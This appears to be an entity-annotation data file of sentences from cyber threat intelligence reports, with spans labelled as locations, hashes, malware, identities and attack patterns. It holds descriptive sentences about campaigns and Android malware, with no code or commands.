[ { "id": 23459, "label": "location", "start_offset": 17, "end_offset": 25 }, { "id": 23460, "label": "location", "start_offset": 57, "end_offset": 64 }, { "id": 23461, "label": "location", "start_offset": 65, "end_offset": 68 }, { "id": 23462, "label": "location", "start_offset": 83, "end_offset": 86 }, { "id": 23463, "label": "location", "start_offset": 101, "end_offset": 104 }, { "id": 23464, "label": "location", "start_offset": 133, "end_offset": 136 }, { "id": 23465, "label": "location", "start_offset": 137, "end_offset": 142 }, { "id": 23466, "label": "SHA2", "start_offset": 225, "end_offset": 289 }, { "id": 23467, "label": "SHA2", "start_offset": 290, "end_offset": 354 }, { "id": 23468, "label": "MD5", "start_offset": 355, "end_offset": 419 }, { "id": 23469, "label": "SHA1", "start_offset": 420, "end_offset": 484 }, { "id": 23470, "label": "MD5", "start_offset": 485, "end_offset": 549 }, { "id": 23471, "label": "SHA2", "start_offset": 550, "end_offset": 614 }, { "id": 23472, "label": "SHA2", "start_offset": 615, "end_offset": 679 }, { "id": 23473, "label": "SHA2", "start_offset": 680, "end_offset": 744 }, { "id": 23474, "label": "SHA1", "start_offset": 745, "end_offset": 809 }, { "id": 23475, "label": "MD5", "start_offset": 810, "end_offset": 874 }, { "id": 23476, "label": "SHA1", "start_offset": 875, "end_offset": 939 }, { "id": 23477, "label": "MD5", "start_offset": 940, "end_offset": 1004 }, { "id": 23478, "label": "SHA2", "start_offset": 1005, "end_offset": 1069 }, { "id": 23479, "label": "SHA2", "start_offset": 1070, "end_offset": 1134 }, { "id": 23480, "label": "SHA2", "start_offset": 1135, "end_offset": 1199 }, { "id": 23481, "label": "SHA1", "start_offset": 1200, "end_offset": 1264 }, { "id": 23482, "label": "SHA1", "start_offset": 1265, "end_offset": 1329 }, { "id": 23483, "label": "MD5", "start_offset": 1330, "end_offset": 1394 }, { "id": 23484, "label": "MD5", "start_offset": 1395, "end_offset": 1459 }, { "id": 23485, "label": "SHA2", "start_offset": 1460, "end_offset": 1524 }, { "id": 23486, "label": "SHA2", "start_offset": 1525, "end_offset": 1589 }, { "id": 23487, "label": "SHA2", "start_offset": 1590, "end_offset": 1654 }, { "id": 23488, "label": "SHA2", "start_offset": 1692, "end_offset": 1756 }, { "id": 23489, "label": "SHA2", "start_offset": 1757, "end_offset": 1821 }, { "id": 23490, "label": "SHA2", "start_offset": 1822, "end_offset": 1886 }, { "id": 23491, "label": "SHA2", "start_offset": 1887, "end_offset": 1951 }, { "id": 23492, "label": "SHA2", "start_offset": 1952, "end_offset": 2016 }, { "id": 23493, "label": "SHA2", "start_offset": 2017, "end_offset": 2081 }, { "id": 23494, "label": "SHA2", "start_offset": 2082, "end_offset": 2146 }, { "id": 23495, "label": "SHA2", "start_offset": 2147, "end_offset": 2211 }, { "id": 23496, "label": "SHA2", "start_offset": 2212, "end_offset": 2276 }, { "id": 23497, "label": "SHA2", "start_offset": 2277, "end_offset": 2341 }, { "id": 23498, "label": "SHA2", "start_offset": 2342, "end_offset": 2406 }, { "id": 23499, "label": "SHA2", "start_offset": 2407, "end_offset": 2471 }, { "id": 23500, "label": "SHA1", "start_offset": 2472, "end_offset": 2536 }, { "id": 23501, "label": "SHA2", "start_offset": 2537, "end_offset": 2601 }, { "id": 23502, "label": "MD5", "start_offset": 2638, "end_offset": 2702 }, { "id": 23503, "label": "SHA1", "start_offset": 2703, "end_offset": 2767 }, { "id": 23504, "label": "SHA2", "start_offset": 2768, "end_offset": 2832 }, { "id": 23505, "label": "SHA2", "start_offset": 2833, "end_offset": 2897 }, { "id": 23506, "label": "SHA2", "start_offset": 2898, "end_offset": 2962 }, { "id": 23507, "label": "SHA1", "start_offset": 2963, "end_offset": 3027 }, { "id": 23508, "label": "SHA2", "start_offset": 3028, "end_offset": 3092 }, { "id": 23509, "label": "SHA2", "start_offset": 3093, "end_offset": 3157 }, { "id": 23510, "label": "SHA2", "start_offset": 3158, "end_offset": 3222 }, { "id": 23511, "label": "SHA2", "start_offset": 3223, "end_offset": 3287 }, { "id": 23512, "label": "SHA2", "start_offset": 3288, "end_offset": 3352 }, { "id": 23513, "label": "MD5", "start_offset": 3353, "end_offset": 3417 }, { "id": 23514, "label": "SHA1", "start_offset": 3418, "end_offset": 3482 }, { "id": 23515, "label": "SHA2", "start_offset": 3483, "end_offset": 3547 }, { "id": 23516, "label": "SHA2", "start_offset": 3548, "end_offset": 3612 }, { "id": 23517, "label": "SHA2", "start_offset": 3613, "end_offset": 3677 }, { "id": 23518, "label": "SHA2", "start_offset": 3678, "end_offset": 3742 }, { "id": 23519, "label": "SHA2", "start_offset": 3743, "end_offset": 3807 }, { "id": 23520, "label": "SHA2", "start_offset": 3808, "end_offset": 3872 }, { "id": 23521, "label": "SHA2", "start_offset": 3873, "end_offset": 3937 }, { "id": 23522, "label": "SHA2", "start_offset": 3938, "end_offset": 4002 }, { "id": 23523, "label": "SHA2", "start_offset": 4003, "end_offset": 4067 }, { "id": 23524, "label": "SHA2", "start_offset": 4068, "end_offset": 4132 }, { "id": 23525, "label": "SHA2", "start_offset": 4133, "end_offset": 4197 }, { "id": 23526, "label": "SHA2", "start_offset": 4234, "end_offset": 4298 }, { "id": 23527, "label": "location", "start_offset": 4311, "end_offset": 4314 }, { "id": 23528, "label": "SHA2", "start_offset": 4355, "end_offset": 4419 }, { "id": 23529, "label": "MD5", "start_offset": 4420, "end_offset": 4484 }, { "id": 23530, "label": "SHA1", "start_offset": 4485, "end_offset": 4549 }, { "id": 23531, "label": "location", "start_offset": 4574, "end_offset": 4577 } ]
[]
[]
5,367
While the first holds the operating system, the second stores programs’ critical files, such as executables, data, and libraries.
[]
[]
[]
2,989
c. Lost device location.
[]
[]
[]
11,488
During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.
[]
[]
[]
5,845
They could have done a deep fake of Zelensky talking about something that could have caused panic inside the country.
[]
[]
[]
940
Since August 1, Palo Alto Networks WildFire has captured over 18,000 Android apps that contain this library.
[ { "id": 46451, "label": "TIME", "start_offset": 6, "end_offset": 14 }, { "id": 46450, "label": "identity", "start_offset": 16, "end_offset": 43 }, { "id": 46452, "label": "SOFTWARE", "start_offset": 69, "end_offset": 76 } ]
[]
[]
3,606
As with Capesand, we will be monitoring the use of the tools mentioned in this blog entry for any future developments and updates.
[ { "id": 49386, "label": "malware", "start_offset": 8, "end_offset": 16 } ]
[]
[]
4,846
The breadth of targets in hack-for-hire campaigns stands in contrast to many government-backed operations, which often have a clearer delineation of mission and targets.
[ { "id": 50806, "label": "attack-pattern", "start_offset": 26, "end_offset": 39 } ]
[]
[]
1,132
Luckily, the most objective piece of data collected about each mutex, how many samples were classified benign vs. malware, has all the information necessary to ensure that the researchers’ tackle the low hanging fruit first.
[]
[]
[]
14,405
More tools will typically be downloaded using the command & control infrastructure to help with their attack.
[]
[]
[]